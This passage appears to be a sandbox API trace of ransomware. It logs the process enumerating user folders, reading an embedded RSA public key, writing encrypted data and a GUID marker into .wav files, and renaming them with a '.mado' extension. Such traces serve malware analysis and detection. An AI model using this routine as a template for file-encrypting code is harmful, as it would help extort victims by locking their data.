nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0204.243] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0204.243] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0204.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.243] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned=".ini" [0204.243] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0204.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.243] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned=".lnk" [0204.243] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0204.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.243] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned=".lnk" [0204.243] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0204.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.243] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned=".lnk" [0204.243] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0204.244] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0204.244] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.244] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff1f8 [0204.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.244] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0204.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e798 [0204.244] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0204.244] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.244] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.244] PathFindFileNameW (pszPath="") returned="" [0204.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff1f8 [0204.244] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0204.244] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3578 [0204.244] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.244] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0204.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e798 [0204.245] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0204.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.245] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.245] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.245] PathFindFileNameW (pszPath="") returned="" [0204.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.245] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd94853a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd94853a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0204.245] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd94853a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd94853a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0204.245] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x805cef90, ftCreationTime.dwHighDateTime=0x1d5e26b, ftLastAccessTime.dwLowDateTime=0x12785360, ftLastAccessTime.dwHighDateTime=0x1d5e087, ftLastWriteTime.dwLowDateTime=0x12785360, ftLastWriteTime.dwHighDateTime=0x1d5e087, nFileSizeHigh=0x0, nFileSizeLow=0x14ea6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0tNIoEsMwD.wav", cAlternateFileName="0TNIOE~1.WAV")) returned 1 [0204.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.245] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tNIoEsMwD.wav") returned=".wav" [0204.245] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tNIoEsMwD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0tnioesmwd.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.247] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=85670) returned 1 [0204.247] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.249] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x14e80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.249] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.250] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.250] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x14ea6, lpOverlapped=0x0) returned 1 [0204.251] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.251] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.251] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.251] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.252] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.252] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.252] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.252] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.252] GetLastError () returned 0x0 [0204.252] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.253] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.253] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.253] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.253] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.253] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c8d0 [0204.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe148 | out: hHeap=0x2c0000) returned 1 [0204.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe160 | out: hHeap=0x2c0000) returned 1 [0204.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe190 | out: hHeap=0x2c0000) returned 1 [0204.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe190 [0204.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe160 [0204.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe148 [0204.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bc98 [0204.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bdb0 [0204.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe160 | out: hHeap=0x2c0000) returned 1 [0204.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe148 | out: hHeap=0x2c0000) returned 1 [0204.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe190 | out: hHeap=0x2c0000) returned 1 [0204.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.254] GetCurrentThreadId () returned 0x600 [0204.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68078 [0204.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b711b0 [0204.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.255] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x14ea6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.255] WriteFile (in: hFile=0x63c, lpBuffer=0x3b68078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b68078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0204.255] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.255] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.255] CloseHandle (hObject=0x63c) returned 1 [0204.256] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tNIoEsMwD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0tnioesmwd.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tNIoEsMwD.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0tnioesmwd.wav.mado")) returned 1 [0204.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.257] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.258] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0924800, ftCreationTime.dwHighDateTime=0x1d5e1b5, ftLastAccessTime.dwLowDateTime=0xbe804570, ftLastAccessTime.dwHighDateTime=0x1d5d9f5, ftLastWriteTime.dwLowDateTime=0xbe804570, ftLastWriteTime.dwHighDateTime=0x1d5d9f5, nFileSizeHigh=0x0, nFileSizeLow=0x187e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="21GtcRKf ie.wav", cAlternateFileName="21GTCR~1.WAV")) returned 1 [0204.259] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\21GtcRKf ie.wav") returned=".wav" [0204.259] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\21GtcRKf ie.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\21gtcrkf ie.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.259] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=100321) returned 1 [0204.259] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.261] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x187bb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.261] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.263] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x187e1, lpOverlapped=0x0) returned 1 [0204.264] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.264] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.264] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.264] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.265] 